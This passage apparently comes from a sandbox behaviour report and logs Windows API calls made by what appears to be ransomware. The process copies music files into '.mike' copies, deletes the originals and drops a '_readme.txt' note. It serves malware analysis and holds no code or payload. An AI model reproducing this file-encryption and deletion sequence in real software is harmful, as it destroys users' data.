lpFilePart=0x0) returned 0x4f [0154.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.367] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.367] GetFileType (hFile=0x1c8) returned 0x1 [0154.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.367] GetFileType (hFile=0x1c8) returned 0x1 [0154.367] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0154.367] WriteFile (in: hFile=0x1c8, lpBuffer=0x2140a10*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2140a10*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0154.368] CloseHandle (hObject=0x1c8) returned 1 [0154.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0154.368] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3"), fInfoLevelId=0x0, lpFileInformation=0x21404fc | out: lpFileInformation=0x21404fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60222d0, ftCreationTime.dwHighDateTime=0x1d4d4a8, ftLastAccessTime.dwLowDateTime=0x71ee2b20, ftLastAccessTime.dwHighDateTime=0x1d4c595, ftLastWriteTime.dwLowDateTime=0x71ee2b20, ftLastWriteTime.dwHighDateTime=0x1d4c595, nFileSizeHigh=0x0, nFileSizeLow=0x15551)) returned 1 [0154.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0154.368] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", lpFilePart=0x0) returned 0x4a [0154.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.369] GetFileType (hFile=0x1c8) returned 0x1 [0154.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.369] GetFileType (hFile=0x1c8) returned 0x1 [0154.369] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0154.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x2141b44, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2141b44*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0154.370] CloseHandle (hObject=0x1c8) returned 1 [0154.370] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.370] GetFileType (hFile=0x1c8) returned 0x1 [0154.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.370] GetFileType (hFile=0x1c8) returned 0x1 [0154.370] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0154.371] WriteFile (in: hFile=0x1c8, lpBuffer=0x214c0ac*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x214c0ac*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0154.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.372] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0154.373] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.374] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0154.375] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.377] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0154.378] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.379] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0154.412] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.414] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0154.415] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.416] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0154.417] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.419] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0154.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0154.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0154.421] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0154.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0154.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0154.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0154.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0154.425] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b6b08*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21b6b08*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0154.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3.mike", lpFilePart=0x0) returned 0x4f [0154.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.427] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3", dwFileAttributes=0x80) returned 1 [0154.427] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\fs512rjzK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gv_qpvtebtk0bd3u\\j687x_v\\fs512rjzk.mp3")) returned 1 [0154.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\_readme.txt", lpFilePart=0x0) returned 0x48 [0154.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af020) returned 1 [0154.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af01c) returned 1 [0154.433] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b9f90*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21b9f90*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0154.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0154.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\GV_QpvTebTk0bD3u\\j687X_V\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe881f500, ftCreationTime.dwHighDateTime=0x1d4d337, ftLastAccessTime.dwLowDateTime=0x254bbd80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25554300, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0154.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe881f500, ftCreationTime.dwHighDateTime=0x1d4d337, ftLastAccessTime.dwLowDateTime=0x254bbd80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25554300, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2520e4c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2520e4c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2520e4c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x101f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-XOYI1A1RnQ8J.mp3.mike", cAlternateFileName="-XOYI1~1.MIK")) returned 1 [0154.435] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25234620, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb310, dwReserved0=0x0, dwReserved1=0x0, cFileName="Caj2AdGH.mp3.mike", cAlternateFileName="CAJ2AD~1.MIK")) returned 1 [0154.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25495c20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcf40, dwReserved0=0x0, dwReserved1=0x0, cFileName="D1ejPh8qXaY6t7 2MJS.wav.mike", cAlternateFileName="D1EJPH~1.MIK")) returned 1 [0154.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5cfba0, ftCreationTime.dwHighDateTime=0x1d4cc29, ftLastAccessTime.dwLowDateTime=0x9d489580, ftLastAccessTime.dwHighDateTime=0x1d4cf9a, ftLastWriteTime.dwLowDateTime=0x9d489580, ftLastWriteTime.dwHighDateTime=0x1d4cf9a, nFileSizeHigh=0x0, nFileSizeLow=0x3ea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="f0bMV.m4a", cAlternateFileName="")) returned 1 [0154.436] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254bbd80, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x254bbd80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2552e1a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x15780, dwReserved0=0x0, dwReserved1=0x0, cFileName="fs512rjzK.mp3.mike", cAlternateFileName="FS512R~1.MIK")) returned 1 [0154.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25554300, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0154.437] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25234620, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x25234620, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x25554300, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0154.438] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0154.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0154.438] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.438] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.439] CoTaskMemFree (pv=0x508980) [0154.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI", lpFilePart=0x0) returned 0x2b [0154.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0154.440] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f45af0, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0xa3234750, ftLastAccessTime.dwHighDateTime=0x1d4ce2f, ftLastWriteTime.dwLowDateTime=0xa3234750, ftLastWriteTime.dwHighDateTime=0x1d4ce2f, nFileSizeHigh=0x0, nFileSizeLow=0x1305c, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Hsn9vN-GR4PEp.m4a", cAlternateFileName="0HSN9V~1.M4A")) returned 1 [0154.441] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0154.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0154.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0154.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0154.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0154.443] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0154.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.444] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.445] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav", lpFilePart=0x0) returned 0x3e [0154.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0154.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0154.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.447] WriteFile (in: hFile=0x1c8, lpBuffer=0x21c2570*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21c2570*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0154.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0154.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0154.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.451] SetThreadErrorMode 